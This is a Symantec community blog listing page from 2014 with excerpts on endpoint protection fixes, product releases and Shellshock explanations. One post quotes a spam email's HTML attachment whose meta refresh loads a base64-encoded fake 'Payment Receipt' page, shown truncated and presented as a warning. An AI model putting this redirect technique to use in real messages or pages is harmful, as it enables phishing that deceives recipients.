Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Community Blog
Showing posts in English
Dhasan | 09 Oct 2014 | 1 comment

SEPM home page dash board is not updating quickly

After SEP client installation shows under up-to-date category even though the client is not up-to-date

This is observed if we install SEP Client using the package exported from SEPM a month or week ago...and the LU policy is set not to download updates from SEPM or directly from Symantec...that client goes to up-to-date category then after long time..it disappears from that then it goes to out-of-date..

 

AV - up to date.png

 

av -up to date.jpg

av -up to date 1.jpg

Chetan Savade | 07 Oct 2014 | 5 comments

Hello Everyone,

Symantec Endpoint Encryption v11.0.0 has been released. Release is now available on fileconnect to download.

New enhancements have been introuduced in the release, few of them are listed here:

Feature Highlights:

New integrated Endpoint Encryption client:

o   Built on PGP technology

o   Managed by Symantec Endpoint Encryption Management Server

Various client deployment options:

o   Provides support for never-connected and seldom-connected client deployment

o   Policy delivery though GPO, native policy or install-time policy

o   Seamless user registration and enrollment

Various Drive Encryption Recovery Options:

o   Help Desk...

Sankara | 06 Oct 2014 | 0 comments

Issue : Symantec Data Center Security 6.0 client not getting IP via DHCP even with Windows core policy

 

Cause : Known issue with SDCSS 6.0  -  Windows default core policy is not allowing svchost.exe to access DHCPCSVC.DLL

 

Environment : Symantec Data Center Security 6.0

 

Solution : 

Edit the SDCSS prevention policy

Navigate to 

 Sandboxes

  - Core OS Service Options

    - Default Windows Services [def_winsvcs_ps,netsvcs_ps]

       - Registry Rules

         - Writeable resource List

             - Allow but log modifications to these Registry keys

 

Resource Path:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services

Program Path: %systemroot%\system32\svchost.exe...

vgtero | 03 Oct 2014 | 1 comment

There is a new vulnerability in the commonly used UNIX shell BASH, which the media is now calling Shellshock.  

What is Shellshock? 

A new vulnerability has been found that potentially affects most versions of the Linux and UNIX operating systems, in addition to Mac OS X (which is based around Unix). Known as the “Bash Bug” or “Shellshock,” the GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271) could allow an attacker to gain control over a targeted computer if exploited successfully.

The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and UNIX. Bash acts as a command language interpreter. In other words, it allows the user to type commands into a simple text-based window, which the operating system will then run.

For full details see: the Symantec Security...

jjesse | 03 Oct 2014 | 0 comments

Recently I was doing an install of Symantec DLP on a Red Hat Linux box that was a member of LDAP and had the /home folder automounted and didn't allow for us to write to that folder.  When a new local user was created via the adduser command it would not work without passing a command line option to change the location of the home directory (adduser -b /opt/users/).

During the install of Symantec DLP, the installer creates a user (protect, protect_update) and would fail because the home directory (/home/protect) could not be created.

So the question was asked… Can we create a user, populate the home directory outside of /home and then perform the install of the system?

Answer:  No… The installer for Symantec DLP needs to create the correct users and must be able to write /home when creating the user.  There is currently an enhancement request within Symantec to allow a pre-created account.

vgtero | 01 Oct 2014 | 0 comments

There is a new vulnerability in the commonly used Unix shell BASH, which the media is now calling Shellshock.   Customers that have Critical Systems Protection/Data Center Security: Server Advanced can use their investments to protect their server infrastructure from this vulnerability. 

Situation Overview:   What is “Shellshock?” 

A new vulnerability has been found that potentially affects most versions of the Linux and Unix operating systems, in addition to Mac OS X (which is based around Unix). Known as the “Bash Bug” or “ShellShock,” this vulnerability could allow an attacker to gain control over a targeted computer if exploited successfully.

The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and Unix. Bash acts as a command language interpreter. In other words, it allows the user to type commands into a simple text-based window, which the operating...

Dhasan | 29 Sep 2014 | 0 comments

Issue : Non-English character is not showing up in Symantec Endpoint Protection Manager reports in Excel

Cause : SEPM compatible with UTF-8 encoding

 

Solution :

1. Open the CSV report file in Notepad.

2. Click on save as 'UTF-8' under encoding.

3. Then Open CSV in Excel.

 

mon_raralio | 22 Sep 2014 | 3 comments

Hi all! It's been a while since I was here (a little over 2 years). A lot has changed. Anyway, let's get to it.

How Code injection is used

I've received 2 spam mails on my Yahoo account, which by the way, scans any attachments using Norton. There is an http attachment which I wouldn't recommend you clicking on to open a new browser tab or window. The attachment looks like this:

<html>
<title> </title>
<meta http-equiv="refresh" content="0;data:text/html;base64,DQo8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtDQoNCnRyYW5zaXRpb25hbC5kdGQiPjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPHRpdGxlPlBheW1lbnQgUmVjZWlwdDwvdGl0bGU+DQo8ZnJhbWVzZXQ+...
Steve C Blair | 22 Sep 2014 | 0 comments

Building great software begins and ends with you, our customer. By giving you visibility into our software and asking for your feedback, advice, and suggestions, we deliver better software solutions to help you solve your security needs.

Symantec will be releasing a new version of our Data Center Security (DCS) solution in the first half of calendar year 2015. DCS version 6.5 will include an enhanced architecture, deliver a web-based unified console, include support for virtual computing environments and support policy based security controls in an integrated offering.  DCS 6.5 delivers the protection capability to take control of your IT environment by coordinating threat management and collaborative security on virtual workloads.  Additionally DCS 6.5 provides new software defined security functionally to create and orchestrate multi-product security...

Chetan Savade | 19 Sep 2014 | 28 comments

Hello Everyone,

On September 18, 2014, Symantec released Symantec Endpoint Protection 12.1 Release Update 5 (12.1.5). You can download this version from Symantec FileConnect.

Symantec Endpoint Protection 12.1.5 includes a number of new features, including:

Bandwidth throttling to control client/server communication traffic
Content storage optimization that greatly reduces disk space used by Symantec Endpoint Protection Manager. It's applicable only for SEPM not for clients.
Symantec Endpoint Protection for Linux, which allows Linux clients to be managed through the Endpoint Protection Manager
For more information about this release, read the Release Notes or the updated product documentation in the Related Articles section.   

Refer this blog:...